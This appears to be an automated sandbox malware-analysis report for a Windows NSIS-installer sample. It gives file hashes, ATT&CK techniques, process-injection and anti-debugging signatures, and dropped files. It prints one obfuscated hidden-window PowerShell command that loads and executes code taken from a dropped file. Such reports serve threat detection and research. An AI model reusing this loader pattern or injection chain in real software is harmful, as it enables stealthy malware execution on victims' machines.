fa85009348923daee9acc7adef2f6926f6442aabffcf393abaae4ab17cc9795c

General

Target

37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
Size

579KB
MD5

8eb6236d11b0463ae82eb268ccc1f7e9
SHA1

08e1140bb7dd86231b8dbbc686e894cfe1d1c7b0
SHA256

37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01
SHA512

d07bf2ec8ca8a57475b1d03214dea1b5c2f300962618d8fde5d987d94c749a0282cb639d6162d79ba10010c05f3df22b7e5d1036cb91bfdd1475198f82fc1af5
SSDEEP

12288:sCn4AyHnseftJpS/mErsKah4dNTTdAPCDbWhwP8wEV:/nEnseftbYmtX4pTywP8R

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2596	powershell.exe

Loads dropped DLL 6 IoCs

pid	Process
2716	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
2716	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
2716	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
2716	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
2596	powershell.exe
1340	Landingspunkternes.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2596	powershell.exe
1340	Landingspunkternes.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2596 set thread context of 1340	2596	powershell.exe	33

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\astonied.ini	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
File opened for modification	C:\Program Files (x86)\indflyvnings\Sparhawk128.Mod	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Fonts\frasiger.ini	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
File created	C:\Windows\resources\sammentrkket\fatherlike.lnk	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Landingspunkternes.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x00330000000194e9-47.dat	nsis_installer_1
behavioral1/files/0x00330000000194e9-47.dat	nsis_installer_2

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2596	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2596	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2716 wrote to memory of 2596	2716	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe	30
PID 2716 wrote to memory of 2596	2716	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe	30
PID 2716 wrote to memory of 2596	2716	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe	30
PID 2716 wrote to memory of 2596	2716	37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe	30
PID 2596 wrote to memory of 1340	2596	powershell.exe	33
PID 2596 wrote to memory of 1340	2596	powershell.exe	33
PID 2596 wrote to memory of 1340	2596	powershell.exe	33
PID 2596 wrote to memory of 1340	2596	powershell.exe	33
PID 2596 wrote to memory of 1340	2596	powershell.exe	33
PID 2596 wrote to memory of 1340	2596	powershell.exe	33

C:\Users\Admin\AppData\Local\Temp\37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe
"C:\Users\Admin\AppData\Local\Temp\37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2716
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Rigsrevisorers=Get-Content 'C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Arbouriculture248.fra';$Cocculus=$Rigsrevisorers.SubString(9851,3);.$Cocculus($Rigsrevisorers)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2596
- - C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe
    "C:\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:1340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Arbouriculture248.fra

Filesize
67KB

MD5
f920388117d05e71adf552e886f824ca

SHA1
1ea3664c4cf6305438c1fc84b7c6d980f39ae0b5

SHA256
ad0c18269a3971545eedcd2ddb5617c8dfd34e452bd43a1bf287d7b8be902289

SHA512
f2d3da62202662f6a29510f9ea2f66e144565d53839aa878c9589bafb5397457d9a67abdaf9cd3b8f98a56e50dba64176251a6d90c403008a73bfd158985d96f

Download Submit
C:\Users\Admin\AppData\Roaming\Watertown136\Brevskolen141\Receptiv147\Ligevgtstilstand.Sto

Filesize
329KB

MD5
cbfbd9d02683e7233a6937287e344bc3

SHA1
0522a3a3d1511ffde52174f662012d552bbab6ff

SHA256
4e84e07a820ad0f07c0d6ef0396bf9c4cce2c4a2e0bfc6a8f1a37aadb892bb80

SHA512
51518a7454f702f392fbb5f976ea7c49347c8430f5866f98c6971c595cdf5892180b9b3a74d031cdfcd9461c5822bc42084615da45d27554861ab029f688e8e3

Download Submit
\Users\Admin\AppData\Local\Temp\Landingspunkternes.exe

Filesize
579KB

MD5
8eb6236d11b0463ae82eb268ccc1f7e9

SHA1
08e1140bb7dd86231b8dbbc686e894cfe1d1c7b0

SHA256
37d1af5c7af78a7bcb958b0b71440091bec44ec86f33cd7547b18eb748d0bc01

SHA512
d07bf2ec8ca8a57475b1d03214dea1b5c2f300962618d8fde5d987d94c749a0282cb639d6162d79ba10010c05f3df22b7e5d1036cb91bfdd1475198f82fc1af5

Download Submit
\Users\Admin\AppData\Local\Temp\nsy26C3.tmp\BgImage.dll

Filesize
7KB

MD5
49998d066af103d06b56f5b4c76b1497

SHA1
b7dce166147f40dfa17f5ca950c4e324a10d04be

SHA256
95042dbe7428461ee7fd210acf37040eb921012c7b32f66cb54766f0a16bb5b6

SHA512
61b0d75ef3a18c8c13ad8c614a012a71cbc4f6fd4bba0aa0c7b866e1a8fbf5f9fdb3e012a3566586d47fc8b456a7de36a06a0d70cdf27e504aac64eab37555d7

Download Submit
\Users\Admin\AppData\Local\Temp\nsy26C3.tmp\nsDialogs.dll

Filesize
9KB

MD5
19d3373e403a6e724cfa1563dfd1f463

SHA1
4917547b355a91e9431879209f56925097bf4fb3

SHA256
873fa0c52eae7cfbed56ea18b21fad0ca8f018ab7f305bd1db1a3ec454e353d1

SHA512
b6f6db23376ade4bb864ea14244980612f42f322d3915540090bfe8edc80e9577b7aec3589bd587ca47a729371ed8ab8e6e23031bb3e3f524d48783637646193

Download Submit
\Users\Admin\AppData\Local\Temp\nsy26C3.tmp\nsExec.dll

Filesize
6KB

MD5
6c881f00ba860b17821d8813aa34dbc6

SHA1
0e5a1e09b1ce1bc758d6977b913a8d9ccbe52a13

SHA256
bcb93204bd1854d0c34fa30883bab51f6813ab32abf7fb7d4aeed21d71f6af87

SHA512
c78d6f43aa9bb35260a7bd300392ce809282660283fa6cb3059bae50d6db229b0b853cab7c949d4bdf19309fb183257b1c9feb01a66347e1c0adeb21543315b6

Download Submit
memory/1340-51-0x0000000000480000-0x00000000014E2000-memory.dmp

Filesize
16.4MB

Download
memory/2596-36-0x0000000073570000-0x0000000073B1B000-memory.dmp

Filesize
5.7MB

Download
memory/2596-37-0x0000000073570000-0x0000000073B1B000-memory.dmp

Filesize
5.7MB

Download
memory/2596-42-0x0000000073570000-0x0000000073B1B000-memory.dmp

Filesize
5.7MB

Download
memory/2596-38-0x0000000073570000-0x0000000073B1B000-memory.dmp

Filesize
5.7MB

Download
memory/2596-44-0x0000000073570000-0x0000000073B1B000-memory.dmp

Filesize
5.7MB

Download
memory/2596-45-0x0000000006530000-0x000000000C214000-memory.dmp

Filesize
92.9MB

Download
memory/2596-46-0x0000000073570000-0x0000000073B1B000-memory.dmp

Filesize
5.7MB

Download
memory/2596-39-0x0000000073570000-0x0000000073B1B000-memory.dmp

Filesize
5.7MB

Download
memory/2596-35-0x0000000073571000-0x0000000073572000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing